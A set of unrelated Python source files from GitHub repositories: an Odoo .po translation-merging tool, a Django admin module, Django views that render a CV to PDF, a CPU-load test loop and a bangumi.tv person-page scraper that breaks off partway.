{"seq_id":"40049411813","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nAction may be:\n- Dictionary\n- PO\n- End\n- Ignore\n\"\"\"\nfrom __future__ import print_function, unicode_literals\n\nimport csv\nimport os\nimport re\nimport sys\nimport time\nfrom builtins import input\n\n# from subprocess import PIPE, Popen\n\nfrom babel.messages import pofile\nfrom openpyxl import load_workbook\n\nfrom os0 import os0\nfrom python_plus import _c\nimport makepo_it\n\ntry:\n from z0lib.z0lib import z0lib\nexcept ImportError:\n from z0lib import z0lib\ntry:\n from clodoo import clodoo\nexcept ImportError:\n import clodoo\n\n\n__version__ = \"2.0.11\"\n\nMAX_RECS = 100\nPUNCT = [' ', '.', ',', '!', ':']\nTNL_DICT = {}\nTNL_ACTION = {}\nSYNTAX = {'string': re.compile('\"([^\"\\\\\\n]|\\\\.|\\\\\\n)*\"')}\nVERSIONS = (\n '16.0',\n '15.0',\n '14.0',\n '13.0',\n '12.0',\n '11.0',\n '10.0',\n '9.0',\n '8.0',\n '7.0',\n '6.1',\n)\nPROTECT_TOKENS = [\n 'Adviser',\n 'Apply',\n 'Approve',\n 'Cancel',\n 'Close',\n 'Compute',\n 'Confirm',\n 'Cost of Revenue',\n 'Create',\n 'Currencies',\n 'Currency',\n 'Discard',\n 'Display',\n 'Dominica',\n 'done',\n 'Done',\n 'Export',\n 'Kenya',\n 'Journal',\n 'Mauritania',\n 'Myanmar',\n 'Name',\n 'Niger',\n 'Partner',\n 'Partners',\n 'Remove',\n 'Report',\n 'Run',\n 'Save',\n 'Set',\n
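 # every term listed here is forced to the Dictionary action during\n # interactive conflict resolution (see load_terms_from_pofile below)\n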
 'The rate of the currency to the currency of rate 1',\n 'Uninstall',\n 'Update',\n (\n 'You can either upload a file from your computer or '\n 'copy/paste an internet link to your file'\n ),\n]\nmsg_time = time.time()\n\n\ndef msg_burst(text):\n global msg_time\n t = time.time() - msg_time\n if t > 3:\n print('\\t', text)\n msg_time = time.time()\n\n\ndef set_odoo_path(ctx, version):\n if ctx['pofile']:\n return os.path.abspath(\n os.path.join(\n os.path.dirname(ctx['pofile'].replace(ctx['branch'], version)), '../..'\n )\n )\n odoo_path = os.path.expanduser('~/%s' % version)\n if not os.path.exists(odoo_path):\n print('\\tPaths of Odoo %s not found' % version)\n return False\n return odoo_path\n\n\ndef change_name(ctx, filename, version):\n filename = filename.replace(ctx['odoo_ver'], version)\n majver = int(ctx['odoo_ver'].split('.')[0])\n if majver >= 10:\n filename = filename.replace('/openerp/addons/', '/odoo/addons/')\n else:\n filename = filename.replace('/odoo/addons/', '/openerp/addons/')\n return filename\n\n\ndef term_wo_punct(msgid, msgstr):\n lpunct = rpunct = ''\n while msgid and msgid[-1] in PUNCT:\n rpunct = msgid[-1] + rpunct\n if msgstr and msgid[-1] == msgstr[-1]:\n msgstr = msgstr[:-1]\n msgid = msgid[:-1]\n while msgstr and msgstr[-1] in PUNCT:\n msgstr = msgstr[:-1]\n while msgid and msgid[0] in PUNCT:\n lpunct = lpunct + msgid[0]\n if msgstr and msgid[0] == msgstr[0]:\n msgstr = msgstr[1:]\n msgid = msgid[1:]\n while msgstr and msgstr[0] in PUNCT:\n msgstr = msgstr[1:]\n if msgid and msgstr:\n caseid = 'U' if msgid[0].isupper() else 'l'\n casestr = 'U' if msgstr[0].isupper() else 'l'\n if len(msgid) > 1:\n caseid += 'U' if msgid[1].isupper() else 'l'\n if len(msgstr) > 1:\n casestr += 'U' if msgstr[1].isupper() else 'l'\n if caseid != casestr:  # was 'casestr != casestr', which is always False\n if caseid == 'Ul' and casestr == 'll':\n msgstr = msgstr[0].upper() + msgstr[1:]\n elif caseid == 'll' and casestr == 'Ul':\n msgstr = msgstr[0].lower() + msgstr[1:]\n return msgid, msgstr, lpunct, rpunct\n\n\ndef term_wo_tag(msgid):\n ltag = ''\n rtag = ''\n x = re.match('<[^>]+>', msgid)\n # the loop body was garbled in the source; reconstructed: collect leading\n # tags, derive the matching closing tag, then cut msgid at that closing tag\n while x:\n ltag += msgid[: x.end()]\n rtag = msgid[: x.end()].replace(\"<\", \"</\")\n msgid = msgid[x.end():]\n x = re.match('<[^>]+>', msgid)\n x = re.search(rtag, msgid)\n if x:\n msgid = msgid[: x.start()]\n return ltag, rtag\n\n\ndef term_with_punct(msgid, msgstr, lpunct, rpunct):\n if msgid:\n return lpunct + msgid + rpunct, lpunct + msgstr + rpunct\n return lpunct + msgstr + rpunct\n\n\ndef term_with_tag(msgstr, ltag, rtag):\n if not msgstr.endswith(rtag):\n msgstr = ltag + msgstr + rtag\n return msgstr\n\n\ndef load_default_dictionary(ctx, source):\n def process_row(ctx, module_rows, row):\n if isinstance(module_rows, list) and row['module']:\n if row['module'] == ctx['module_name']:\n module_rows.append(row)\n return 0\n if not row['msgid'] or not row['msgstr']:\n return 0\n msgid, TNL_DICT[msgid], lpunct, rpunct = term_wo_punct(\n os0.u(row['msgid']), os0.u(row['msgstr'])\n )\n if not TNL_DICT[msgid]:\n TNL_ACTION[msgid] = 'P'\n return 0\n elif msgid == TNL_DICT[msgid] or (\n msgid[0] != ' '\n and msgid[0] != '\\n'\n and msgid[0] == TNL_DICT[msgid][0].lower()\n and msgid[1:] == TNL_DICT[msgid][1:]\n ):\n TNL_ACTION[msgid] = '*'\n return 0\n if ctx['action'] and ctx['action'][0].upper() in ('D', 'P', '*'):\n TNL_ACTION[msgid] = ctx['action'][0].upper()\n else:\n TNL_ACTION[msgid] = 'D'\n return 1\n\n def read_csv(ctx, source):\n ctr = 0\n if ctx['opt_verbose']:\n print(\"\\tReading %s into dictionary\" % source)\n csv.register_dialect(\n 'dict', delimiter=_c('\\t'), quotechar=_c('\"'), quoting=csv.QUOTE_MINIMAL\n
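 # tab-separated with minimal quoting; _c() presumably coerces the delimiter\n # type for py2/py3 compatibility (assumption based on the python_plus import)\n 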
)\n csv_fd = open(source, 'rU')\n hdr_read = False\n csv_obj = csv.DictReader(\n csv_fd, fieldnames=[], restkey='undef_name', dialect='dict'\n )\n module_rows = []\n for row in csv_obj:\n if not hdr_read:\n hdr_read = True\n csv_obj.fieldnames = row['undef_name']\n continue\n ctr += process_row(ctx, module_rows, row)\n for row in module_rows:\n ctr += process_row(ctx, None, row)\n if ctx['opt_verbose']:\n print(\"\\t... Read %d records\" % ctr)\n return ctr\n\n def read_xlsx(ctx, source):\n ctr = 0\n if ctx['opt_verbose']:\n print(\"\\tReading %s into dictionary\" % source)\n wb = load_workbook(source)\n # sheet = wb.sheet_by_index(0)\n # for sheet in wb:\n # break\n sheet = wb.active\n colnames = []\n for ncol in sheet.columns:\n colnames.append(ncol[0].value)\n module_rows = []\n hdr = True\n for nrow in sheet.rows:\n if hdr:\n hdr = False\n continue\n row = {}\n for ncol, cell in enumerate(nrow):\n row[colnames[ncol]] = (\n cell.value.replace('\\\\n', '\\n') if cell.value else cell.value\n )\n ctr += process_row(ctx, module_rows, row)\n for row in module_rows:\n ctr += process_row(ctx, None, row)\n if ctx['opt_verbose']:\n print(\"\\t... Read %d records\" % ctr)\n return ctr\n\n ctr = 0\n if os.path.isfile(source + '.xlsx'):\n source = source + '.xlsx'\n ctr = read_xlsx(ctx, source)\n elif os.path.isfile(source + '.csv'):\n source = source + '.csv'\n ctr = read_csv(ctx, source)\n return ctr\n\n\ndef save_untranslated(ctx, untnl):\n csv.register_dialect(\n 'transodoo', delimiter=_c(','), quotechar=_c('\\\"'), quoting=csv.QUOTE_MINIMAL\n )\n dict_name = os.path.expanduser('~/odoo_default_tnl.csv')\n with open(dict_name, 'wb') as fd:\n writer = csv.DictWriter(\n fd, fieldnames=('module', 'msgid', 'msgstr'), dialect='transodoo'\n )\n writer.writeheader()\n if untnl is None:\n sorted_list = sorted(TNL_DICT.keys(), key=lambda x: x.lower())\n else:\n sorted_list = sorted(untnl, key=lambda x: x.lower())\n for item in sorted_list:\n msg_burst(item)\n line = {'module': '', 'msgid': os0.b(item), 'msgstr': ''}\n if untnl is None:\n line['msgstr'] = os0.b(TNL_DICT[item])\n if untnl is not None or (\n not item.startswith(' ')\n and not item.startswith('\\n')\n and not item.startswith('===')\n ):\n writer.writerow(line)\n if ctx['opt_verbose']:\n print(\"*** Untranslated dictionary saved at %s ***\" % dict_name)\n\n\ndef translate_html(ctx, msgstr):\n return msgstr\n\n\ndef load_terms_from_pofile(ctx, pofn, def_action=None):\n ctr = 0\n trline = '-' * 60\n if os.path.isfile(pofn):\n if ctx['opt_verbose']:\n print(\"\\tReading %s into dictionary\" % pofn)\n catalog = pofile.read_po(open(pofn, 'r'))\n for message in catalog:\n if not message.id:\n continue\n msgid = message.id\n msgstr = message.string\n msgid2, msgstr2, lpunct, rpunct = term_wo_punct(msgid, msgstr)\n if ctx['tnl_html']:\n msgstr = translate_html(ctx, msgstr)\n if msgid2 not in TNL_DICT:\n TNL_DICT[msgid2] = msgstr2\n TNL_ACTION[msgid2] = 'P'\n ctr += 1\n elif msgstr2 != TNL_DICT[msgid2]:\n print(' Duplicate key \"%s\"' % msgid)\n print(\n ' Dictionary=\"%s\"'\n % term_with_punct(None, TNL_DICT[msgid2], lpunct, rpunct)\n )\n print(' %-60.60s' % trline)\n print(' Po=\"%s\"' % msgstr)\n print(' %-60.60s' % trline)\n dummy = ''\n if msgid2 in PROTECT_TOKENS:\n dummy = 'D'\n elif not msgstr:\n dummy = 'D'\n elif not TNL_DICT[msgid2]:\n dummy = 'P'\n elif msgid2 in TNL_ACTION:\n dummy = TNL_ACTION[msgid2]\n elif '*' in TNL_ACTION:\n dummy = TNL_ACTION['*']\n elif def_action:\n dummy = def_action\n while dummy not in ('D', 'P', 'E', 'I') and 
len(dummy) <= 3:\n dummy = input('>>> (Dictionary,Po,End,Ignore,)? ')\n if dummy == 'E':\n TNL_ACTION['*'] = dummy\n return\n elif dummy == 'I':\n TNL_ACTION[msgid2] = dummy\n continue\n elif len(dummy) >= 3:\n TNL_DICT[msgid2] = os0.u(dummy)\n ctr += 1\n elif dummy == 'P':\n TNL_DICT[msgid2] = msgstr2\n ctr += 1\n print(' KEY=\"%s\"' % msgstr)\n else:\n TNL_ACTION[msgid2] = dummy\n if ctx['opt_verbose']:\n print(\"\\t... Read %d new records\" % ctr)\n return ctr\n\n\ndef parse_pofile(ctx, source, untnl):\n if os.path.isfile(source):\n ctr = 0\n if ctx['opt_verbose']:\n print(\"\\tReading %s\" % source)\n fdiff = False\n catalog = pofile.read_po(open(source, 'r'))\n for message in catalog:\n msgid = os0.u(message.id)\n msgstr = os0.u(message.string)\n msgid2, msgstr2, lpunct, rpunct = term_wo_punct(msgid, msgstr)\n ltag, rtag = term_wo_tag(msgid2)\n if lpunct or rpunct:\n msgid, msgstr = term_with_punct(msgid, msgstr, lpunct, rpunct)\n if not msgid:\n for k, value in message.__dict__.items():\n if k == 'string':\n message.string = u''\n elif value:\n setattr(message, k, value)\n ctr += 1\n elif msgid2 in TNL_DICT and msgstr != TNL_DICT[msgid2]:\n for k, value in message.__dict__.items():\n if k == 'string':\n if ltag and rtag:\n message.string = term_with_tag(TNL_DICT[msgid2], ltag, rtag)\n else:\n message.string = term_with_punct(\n None, TNL_DICT[msgid2], lpunct, rpunct\n )\n elif value:\n setattr(message, k, value)\n ctr += 1\n fdiff = True\n elif msgid and msgid2 not in TNL_DICT and msgid2 not in untnl:\n if ctx['opt_verbose']:\n print('\\tWarning: key <%s> not found in translation!' % msgid2)\n untnl[msgid2] = msgstr2\n if ctx['opt_verbose']:\n print(\"\\t... %d records to update\" % ctr)\n return fdiff, catalog, untnl\n return False, '', untnl\n\n\ndef rewrite_pofile(ctx, pofn, target, version):\n if ctx['opt_verbose']:\n print(\"\\tWriting %s \" % pofn)\n tmpfile = '%s.tmp' % pofn\n bakfile = '%s.bak' % pofn\n pofile.write_po(open(tmpfile, 'wb'), target)\n makepo_it.main(['-b', '%s' % version, '-m', '%s' % ctx['module_name'], tmpfile])\n with open(pofn, 'r') as fd:\n lefts = os0.u(fd.read()).split('\\n')\n with open(tmpfile, 'r') as fd:\n rights = os0.u(fd.read()).split('\\n')\n jj = 0\n for ii in range(len(lefts)):\n line = lefts[ii]\n if line[0:2] == '#.':\n while jj < len(rights) and rights[jj] != line:\n jj += 1\n if jj < len(rights) and rights[jj] == line:\n ii += 1\n while lefts[ii][0:2] == '#:':\n jj += 1\n rights.insert(jj, lefts[ii])\n ii += 1\n jj += 1\n with open(tmpfile, 'wb') as fd:\n fd.write(os0.b('\\n'.join(rights)))\n if os.path.isfile(bakfile):\n os.remove(bakfile)\n if os.path.isfile(pofn):\n os.rename(pofn, bakfile)\n os.rename(tmpfile, pofn)\n\n\ndef get_module_pofile_name(ctx, version):\n odoo_path = set_odoo_path(ctx, version)\n if odoo_path:\n module_path = False\n for root, _dirs, _files in os.walk(odoo_path):\n if (\n root.find('__to_remove') < 0\n and os.path.basename(root) == ctx['module_name']\n and (\n os.path.isfile(os.path.join(root, '__manifest__.py'))\n or os.path.isfile(os.path.join(root, '__openerp__.py'))\n )\n ):\n module_path = root\n break\n if not module_path:\n print(\n '*** Module %s not found for Odoo %s !!!'\n % (ctx['module_name'], version)\n )\n return False\n print('Found path %s' % module_path)\n pofn = os.path.join(module_path, 'i18n', 'it.po')\n if not os.path.isfile(pofn):\n print('*** File %s not found !!!' 
% pofn)\n return False\n return pofn\n return False\n\n\ndef load_dictionary(ctx):\n root = os.environ.get('HOME_DEVEL')\n if not root or not os.path.isdir(root):\n if os.path.isdir(os.path.expanduser('~/odoo/devel')):\n root = os.path.expanduser('~/odoo/devel')\n elif os.path.isdir(os.path.expanduser('~/devel')):\n root = os.path.expanduser('~/devel')\n else:\n print('Development directory ~/devel not found!')\n return 1\n if ctx['dbg_template']:\n dict_name = os.path.join(root, 'pypi', 'tools', 'odoo_default_tnl')\n else:\n dict_name = os.path.join(root, 'venv', 'bin', 'odoo_default_tnl')\n ctr = load_default_dictionary(ctx, dict_name)\n ctx['pofiles'] = {}\n ctx['ctrs'] = {'0': ctr}\n for version in VERSIONS:\n if not ctx['branch']:\n pofn = get_module_pofile_name(ctx, version)\n elif version == ctx['branch'] and ctx['pofile']:\n pofn = ctx['pofile']\n else:\n pofn = ''\n if pofn:\n ctx['pofiles'][version] = pofn\n ctr = load_terms_from_pofile(ctx, pofn)\n ctx['ctrs'][version] = ctr\n return 0\n\n\ndef refresh_dictionary(ctx):\n root = os.environ.get('HOME_DEVEL')\n if not root or not os.path.isdir(root):\n if os.path.isdir(os.path.expanduser('~/odoo/devel')):\n root = os.path.expanduser('~/odoo/devel')\n elif os.path.isdir(os.path.expanduser('~/devel')):\n root = os.path.expanduser('~/devel')\n else:\n print('Development directory ~/devel not found!')\n return 1\n dict_name = os.path.join(root, 'pypi', 'tools', 'odoo_default_tnl')\n load_default_dictionary(ctx, dict_name)\n load_terms_from_pofile(ctx, ctx['ref_pofile'], def_action=ctx['action'])\n # save_untranslated(ctx, None)\n\n\ndef set_header_pofile(ctx, pofile):\n polines = pofile.split('\\n')\n potext = ''\n for line in polines:\n if line.startswith('\"#\\t*'):\n potext += r'\"# %s\\n\"' % ctx['module_name'] + '\\n'\n elif line.startswith('\"# *'):\n potext += r'\"# %s\\n\"' % ctx['module_name'] + '\\n'\n elif line.startswith('\"Project-Id-Version:'):\n potext += r'\"Project-Id-Version: Odoo (%s)\\n\"' % ctx.get('branch', '') + '\\n'\n elif line.startswith('\"Last-Translator:'):\n potext += (\n r'\"Last-Translator: %s <%s>\\n\"'\n % ('Antonio M. 
Vigliotti', 'antoniomaria.vigliotti@gmail.com')\n + '\\n'\n )\n elif line.startswith('\"Language-Team:'):\n potext += (\n r'\"Language-Team: %s (%s)\\n\"'\n % ('Zeroincombenze', 'https://www.zeroincombenze.it/')\n + '\\n'\n )\n potext += r'\"Language: it_IT\\n\"' + '\\n'\n elif line.startswith('\"Language:'):\n pass\n elif line.startswith('\"language'):\n pass\n elif line.startswith('\"Plural-Forms:'):\n potext += r'\"Plural-Forms: nplurals=2; plural=(n != 1);\\n\"' + '\\n'\n else:\n potext += line + '\\n'\n return potext\n\n\ndef translate_module_pofile(ctx):\n untnl = {}\n for version in ctx['pofiles'].keys():\n pofn = ctx['pofiles'][version]\n fdiff, target, untnl = parse_pofile(ctx, pofn, untnl)\n src = '/%s/' % version\n tgt = '/oca%s/' % version.split('.')[0]\n oca_pofn = pofn.replace(src, tgt)\n if not os.path.isfile(oca_pofn):\n oca_pofn = oca_pofn.replace('einvoice', 'fatturapa')\n if os.path.isfile(oca_pofn):\n parse_pofile(ctx, pofn, untnl)\n if not fdiff:\n if ctx['opt_verbose']:\n print(\"No change done.\")\n else:\n rewrite_pofile(ctx, pofn, target, version)\n # save_untranslated(ctx, untnl)\n return 0\n\n\ndef connect_db(ctx):\n dbname = ''\n if ctx['branch']:\n version = ctx['branch']\n dbname = ctx['db_prefix']\n if ctx['opt_verbose']:\n print(\"\\tUpgrade DB %s\" % dbname)\n ctx['svc_protocol'] = ''\n db_found = False\n try:\n uid, ctx = clodoo.oerp_set_env(ctx=ctx, db=dbname, oe_version=version)\n db_found = True\n except BaseException:\n dbname = '%s%s' % (ctx['db_prefix'], version.split('.')[0])\n if not db_found:\n try:\n uid, ctx = clodoo.oerp_set_env(ctx=ctx, db=dbname, oe_version=version)\n db_found = True\n except BaseException:\n print(\"No DB %s found\" % ctx['db_prefix'])\n dbname = ''\n return uid, ctx, dbname\n\n\ndef upgrade_db(ctx):\n def write_tnl(ctx, model, ids, msgid, msgstr, ctr):\n if ids and len(ids) < MAX_RECS:\n for id in ids:\n try:\n clodoo.writeL8(ctx, model, id, {'value': msgstr})\n ctr += 1\n except IOError as e:\n print(\"*** Error %e writing '%s'!!!\" % (e, msgstr))\n except BaseException as e:\n print(\"*** Fatal error %s writing '%s'!!!\" % (e, msgstr))\n clodoo.unlinkL8(ctx, model, id)\n return ctr\n\n if ctx['branch']:\n uid, ctx, dbname = connect_db(ctx)\n if not dbname:\n return\n ctr = 0\n # ir.translation contains Odoo translation terms\n # @src: original (english) term\n # @source: evaluated field that seems a copy of src\n # @value: translated term\n # @name: is environment name; value may be:\n # - type model: \"model name,field name\"\n # - type code: \"source file name\", format 'addons/MODULE_PATH'\n # - type selection: \"MODULE_PATH,field name\"\n # @type: may be [code,constraint,model,selection,sql_constraint]\n # @module: module which added term\n # @state: may be [translated, to_translate]\n # @res_id: id of term means:\n # - type model: record id of model in name\n # - type code: line number in source code (in name)\n # Report translations are in ir.ui.view model\n #\n model = 'ir.translation'\n for msgid2 in TNL_DICT:\n for punct in PUNCT + ['']:\n msgid = msgid2 + punct\n msgstr = TNL_DICT[msgid2] + punct\n if ctx['opt_verbose']:\n msg_burst(msgid)\n ids = clodoo.searchL8(\n ctx,\n model,\n [\n ('lang', '=', 'it_IT'),\n ('type', '=', 'model'),\n ('src', '=', msgid),\n ('module', '=', ctx['module_name']),\n ('value', '!=', msgstr),\n ],\n )\n ctr = write_tnl(ctx, model, ids, msgid, msgstr, ctr)\n ids = clodoo.searchL8(\n ctx,\n model,\n [\n ('lang', '=', 'it_IT'),\n (\n 'name',\n 'in',\n (\n 
'ir.actions.act_window,name',\n 'ir.model,name',\n 'ir.module.category,name',\n 'ir.module.module,description',\n 'ir.module.module,shortdesc',\n 'ir.module.module,summary',\n 'ir.ui.menu,name',\n 'ir.ui.view,arch_db',\n ),\n ),\n ('src', '=', msgid),\n ('value', '!=', msgstr),\n ],\n )\n ctr = write_tnl(ctx, model, ids, msgid, msgstr, ctr)\n if ctx['opt_verbose']:\n print(\"\\t... %d records upgraded\" % ctr)\n if ctx['load_language']:\n clodoo.act_install_language(ctx)\n return 0\n\n\ndef delete_translation(ctx):\n uid, ctx, dbname = connect_db(ctx)\n if not dbname:\n return 0\n if ctx['opt_verbose']:\n print(\"\\tDelete translation from DB %s\" % dbname)\n model = 'ir.translation'\n clodoo.unlinkL8(\n ctx,\n model,\n clodoo.searchL8(\n ctx, model, [('lang', '=', 'it_IT'), ('module', '=', ctx['module_name'])]\n ),\n )\n return 0\n\n\ndef main(cli_args=None):\n # if not cli_args:\n # cli_args = sys.argv[1:]\n parser = z0lib.parseoptargs(\n \"Translate Odoo Package\", \"© 2018-2023 by SHS-AV s.r.l.\", version=__version__\n )\n parser.add_argument(\n \"-A\", \"--action\", help=\"Action: Dict,Po,*\", dest=\"action\", metavar=\"name\"\n )\n parser.add_argument(\n '-B', '--debug-template', action='store_true', dest='dbg_template'\n )\n parser.add_argument(\n \"-b\", \"--branch\", help=\"Odoo branch\", dest=\"branch\", metavar=\"version\"\n )\n parser.add_argument(\n \"-c\",\n \"--config\",\n help=\"configuration file\",\n dest=\"conf_fn\",\n metavar=\"file\",\n default='./clodoo.conf',\n )\n parser.add_argument(\n '-D', '--delete-translation', action='store_true', dest='del_tnl'\n )\n parser.add_argument(\n \"-d\", \"--dbname\", help=\"DB name\", dest=\"db_prefix\", metavar=\"dbname\", default=''\n )\n parser.add_argument('-h')\n parser.add_argument('-H', '--translate-html', action='store_true', dest='tnl_html')\n parser.add_argument(\n '-l', '--load-language', action='store_true', dest='load_language'\n )\n parser.add_argument(\n '-m', '--module_name', action='store', help='filename', dest='module_name'\n )\n parser.add_argument('-n')\n parser.add_argument(\n '-p', '--pofile', action='store', help='pathname', dest='pofile'\n )\n parser.add_argument('-q')\n parser.add_argument(\n '-R', '--ref-pofile', action='store', help='pathname', dest='ref_pofile'\n )\n parser.add_argument('-V')\n parser.add_argument('-v')\n ctx = parser.parseoptargs(sys.argv[1:])\n if not ctx['module_name']:\n print('*** Missing module name! 
Please, use -m switch !!!')\n sys.exit(1)\n if ctx['del_tnl']:\n sys.exit(delete_translation(ctx))\n if ctx['ref_pofile']:\n sts = refresh_dictionary(ctx)\n else:\n sts = load_dictionary(ctx)\n if sts == 0:\n sts = translate_module_pofile(ctx)\n # if sts == 0 and ctx['db_prefix']:\n # sts = upgrade_db(ctx)\n sys.exit(sts)\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"zeroincombenze/tools","sub_path":"wok_code/scripts/odoo_translation_old.py","file_name":"odoo_translation_old.py","file_ext":"py","file_size_in_byte":25639,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"39589298074","text":"from django.contrib import admin\n\nfrom apps.fun_time_friday.models import (\n FunTimeFridayVoiceConnect,\n FunTimeFridayVoiceDisconnect,\n)\nfrom apps.overrides.admin import AutofillCreatorModelAdmin, linkify\n\n\n@admin.register(FunTimeFridayVoiceConnect)\nclass FunTimeFridayVoiceConnectAdmin(AutofillCreatorModelAdmin):\n autocomplete_fields = [\"connector_discord\"]\n list_display = (\n \"__str__\",\n linkify(\"connector_discord\"),\n \"connected_at\",\n \"channel_name\",\n \"creator\",\n )\n list_filter = (\n \"connector_discord\",\n \"creator\",\n )\n fields = (\n \"connector_discord\",\n \"connected_at\",\n \"channel_id\",\n \"channel_name\",\n \"creator\",\n )\n\n\n@admin.register(FunTimeFridayVoiceDisconnect)\nclass FunTimeFridayVoiceDisconnectAdmin(AutofillCreatorModelAdmin):\n autocomplete_fields = [\"disconnector_discord\"]\n list_display = (\n \"__str__\",\n linkify(\"disconnector_discord\"),\n \"disconnected_at\",\n \"channel_name\",\n \"creator\",\n )\n list_filter = (\n \"disconnector_discord\",\n \"creator\",\n )\n fields = (\n \"disconnector_discord\",\n \"disconnected_at\",\n \"channel_id\",\n \"channel_name\",\n \"creator\",\n )\n","repo_name":"HaloFunTime/hft-backend","sub_path":"apps/fun_time_friday/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"3436881497","text":"from django.http import response\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import redirect, render\nfrom .models import Profile\nimport pdfkit\nfrom django.template.loader import get_template\nimport io\n\n# Create your views here.\ndef index(request):\n return render(request, 'pdf/resume.html')\n\ndef formulaire(request):\n if request.method == \"POST\":\n name = request.POST.get(\"name\") \n email = request.POST.get(\"email\") \n phone = request.POST.get(\"phone\") \n address = request.POST.get(\"address\") \n competence = request.POST.get(\"competence\")\n langue = request.POST.get(\"langue\")\n interet = request.POST.get(\"interet\") \n objectif = request.POST.get(\"objectif\") \n experience = request.POST.get(\"experience\") \n education = request.POST.get(\"education\") \n projet = request.POST.get(\"projet\")\n donnees = Profile(name=name, email=email, phone=phone, address=address, competance=competence, experience=experience, objectif=objectif, Projet=projet, interet=interet, langue=langue, education=education) \n donnees.save()\n return redirect('verification')\n return render(request, 'pdf/form.html')\n\ndef verification(request):\n profiles = Profile.objects.all()[:1]\n for profile in profiles:\n name=profile.name\n phone=profile.phone\n email =profile.email\n address =profile.address\n com = profile.competance\n langue = profile.langue\n interet = profile.interet\n exp 
= profile.experience\n objectif = profile.objectif \n education = profile.education \n project = profile.Projet\n\n template = get_template('pdf/generator.html')\n context = {'address':address, 'name':name, 'email':email, 'phone':phone, 'com':com, 'interet':interet, 'langue':langue, 'experience':exp, 'objectif':objectif, 'education': education, 'project':project }\n html = template.render(context)\n options = {\n 'page-size':'Letter',\n 'encoding':'UTF-8',\n }\n pdf = pdfkit.from_string(html, False, options)\n\n reponse = HttpResponse(pdf, content_type='application/pdf')\n reponse['Content-Disposition']=\"attachment\"\n return reponse\n\ndef download(request):\n profile = Profile.objects.all()\n return render(request, 'pdf/download.html', {'profile':profile}) \n\n\n","repo_name":"RomaFirst/full-stack-coding-bootcam-ppython-full-time","sub_path":"week_11/MiniProjet CV_GENRATOR/CV/pdf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"18389631173","text":"# HIGH CPU UTILIZATION RUNNING ON AWS EC2 SERVER\n\nimport math\n\ndef __main__():\n x = 1\n y = 0\n z = 1\n while True:\n if x == 50000:  # '==', not 'is': identity comparison of ints is unreliable\n x = 0\n z = 0\n y += math.sqrt(x)\n z += y\n x += 1\n print(math.sqrt(z))\n\nif __name__ == \"__main__\":\n __main__()\n\n","repo_name":"avivk9/AWS_anomaly_detection","sub_path":"Machine Codes/low_cpu_usage.py","file_name":"low_cpu_usage.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
{"seq_id":"477300638","text":"import random\nimport time\n\nimport requests # HTTP client library\nfrom bs4 import BeautifulSoup\n\nfrom requests_tool import get_random_date_str\nfrom file_tools import open_text, write_list_to_file\n\ncommon_property_list = [\n '简体中文名: ',\n '别名: ',\n '性别: ',\n '生日: ',\n '血型: ',\n '身高: ',\n '星座: ',\n '出身地区: ',\n '所属公司: ',\n '引用来源: ',\n '个人状态: ',\n '官网: ',\n 'FanClub: ',\n 'Twitter: ',\n 'Facebook: '\n]\n\nspecial_property_list = [\n '职业: ',\n]\n\n\n# fetch the raw HTML of a page\ndef get_html_text(url):\n param = {\n 'Connection': 'close',\n 'Content-Encoding': 'gzip',\n 'Content-Type': 'text/html',\n 'Server': 'nginx',\n 'Transfer-Encoding': 'chunked',\n 'Vary': 'Accept-Encoding'\n }\n header = {'Content-Type': 'text/html; charset=utf-8'}\n user_agent_list = [\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36\",\n
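 # one User-Agent is picked at random per request (random.choice below) so\n # repeated scrapes look less uniform\n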
 \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\",\n \"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15\",\n ]\n header['User-Agent'] = random.choice(user_agent_list)\n param['Date'] = get_random_date_str()\n r = requests.get(url, params=param, headers=header, timeout=30)\n r.raise_for_status() # raise HTTPError when the status is not 200\n r.encoding = r.apparent_encoding # apparent_encoding is usually the more accurate guess\n return r.text\n\n\ndef get_dict_for_html_text(i):\n file_content = open_text(i)\n res_dict = {'id': i}\n\n # parse the HTML\n html_code = BeautifulSoup(file_content, 'html.parser')\n\n # fixed person properties\n for common_property in common_property_list:\n span_list = []\n spans = html_code.find_all(\"span\", string=common_property)\n for span in spans:\n if span:\n span_list.append(span.parent.text.replace(common_property, '').strip())\n res_dict[common_property.replace(':', '').strip()] = span_list\n\n # occupation\n h2s = html_code.find_all('h2', {'class': 'subtitle'})\n for h2 in h2s:\n if h2.text.find('职业:') != -1:\n res_dict['职业:'.replace(':', '').strip()] = h2.text.replace('职业:', '').strip().split(' ')\n\n # original name\n h1s = html_code.find_all('h1', {'class': 'nameSingle'})\n for h1 in h1s:\n res_dict['名称'] = h1.find('a').text\n\n return res_dict\n\n\ndef get_person_html_text(start, end):\n base_url = 'https://bangumi.tv/person/{}'\n file_name = 'person_{}.txt'\n save_html_path = './html'\n error_file_no_list = []\n for i in range(start, end):\n try:\n # attempt the download; this may raise\n url = base_url.format(i)\n html_text = get_html_text(url)\n with open(f'{save_html_path}/' + file_name.format(i), 'w+', 